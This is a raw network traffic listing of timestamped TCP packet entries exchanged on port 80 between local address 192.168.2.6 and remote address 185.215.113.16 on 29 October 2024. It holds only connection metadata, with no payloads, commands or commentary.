Oct 29, 2024 06:59:25.519759893 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519773006 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519778967 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.519785881 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519813061 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519818068 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.519846916 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519859076 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519882917 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519884109 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.519891977 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.519896984 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519933939 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.519984961 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.519995928 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520009041 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520024061 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520036936 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520036936 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520050049 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520070076 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520097971 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520136118 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520145893 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520158052 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520184040 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520224094 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520241976 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520270109 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520309925 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520320892 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520353079 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520354986 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520368099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520397902 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520437002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520448923 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520462036 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520487070 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520510912 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520572901 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520586014 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520613909 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520626068 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520637035 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520642042 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520678043 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520708084 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520745039 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520747900 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520757914 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520797968 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520822048 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520833015 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.520870924 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.520939112 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521022081 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521034002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521061897 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521064043 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521081924 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521099091 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521104097 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521147013 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521177053 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521188021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521220922 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521229982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521241903 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521253109 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521264076 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521274090 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521298885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521308899 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521325111 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521337986 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521348000 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521361113 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521385908 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521573067 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521583080 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521598101 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521610022 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521620035 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521621943 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521631956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521644115 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521653891 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521677971 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521684885 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521691084 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521703959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521713018 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521713018 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521737099 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521874905 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521893024 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521904945 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521914959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.521929979 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.521960020 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.603097916 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603128910 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603142023 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603154898 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603167057 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603180885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603193045 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603226900 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.603245974 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603250980 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.603259087 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603271008 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603281975 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.603317022 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.603355885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603373051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603410959 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.603421926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603435040 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603492975 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.603574038 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603599072 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603610992 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603621006 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603631973 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603643894 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603655100 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.603657007 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603663921 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.603671074 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603698015 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.603723049 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.603728056 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603785992 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603799105 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603837013 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.603853941 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603864908 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603877068 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603888035 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.603898048 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.603912115 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.604016066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.604027033 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.604038000 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.604049921 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.604063988 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.604063988 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.604074955 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.604079962 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.604103088 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.613198042 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639041901 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639059067 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639071941 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639082909 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639107943 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639110088 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639136076 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639147997 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639148951 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639158964 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639170885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639184952 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639229059 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639230013 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639297009 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639328003 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639334917 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639345884 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639358997 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639378071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639389992 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639395952 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639411926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639413118 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639424086 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639436007 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639455080 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639472008 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639508009 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639518976 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639544010 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639584064 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639595032 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639625072 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639630079 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639656067 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639667988 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639671087 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639703989 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639713049 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639797926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639816999 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639834881 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639844894 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639847994 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639862061 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639869928 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639873028 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639899015 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.639905930 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639966965 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639981031 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.639982939 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640016079 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640028954 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640031099 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640069962 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640088081 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640120029 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640131950 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640199900 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640222073 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640233040 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640247107 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640263081 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640294075 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640342951 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640361071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640377998 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640396118 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640408993 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640417099 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640422106 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640433073 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640459061 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640486956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640539885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640552044 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640584946 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640595913 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640608072 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640616894 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640616894 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640638113 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640649080 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640649080 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640661001 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640722036 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640816927 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640858889 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.640935898 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640947104 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640958071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640981913 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.640983105 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.641000032 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641011000 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641022921 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641027927 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.641035080 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641047955 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641056061 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.641079903 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.641217947 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641232014 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641244888 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641257048 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641263008 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.641269922 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641279936 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.641310930 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.641352892 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641364098 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641377926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641397953 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.641416073 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641453981 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641469002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641480923 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641491890 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.641496897 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.641516924 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.641541958 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.722652912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722704887 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722728014 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722739935 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722752094 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722759962 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.722779036 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722791910 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722803116 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.722810984 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.722857952 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722877979 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722888947 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722899914 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722903967 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.722929955 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.722932100 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722943068 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722978115 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.722979069 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.722996950 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723006964 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723037004 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.723050117 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.723064899 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723077059 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723089933 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723104954 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723110914 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.723141909 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.723150969 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723162889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723195076 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.723217964 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723229885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723241091 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723258972 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723273993 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.723295927 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.723332882 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723354101 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723372936 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723385096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723392963 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.723397017 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723428011 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.723515987 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723525047 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723536015 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723556042 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.723561049 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723572969 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.723573923 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723587990 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723623991 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.723702908 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.723750114 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.723757982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758641958 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758655071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758668900 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758686066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.758694887 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.758723021 CET	80	49769	185.215.113.16	192.168.2.6
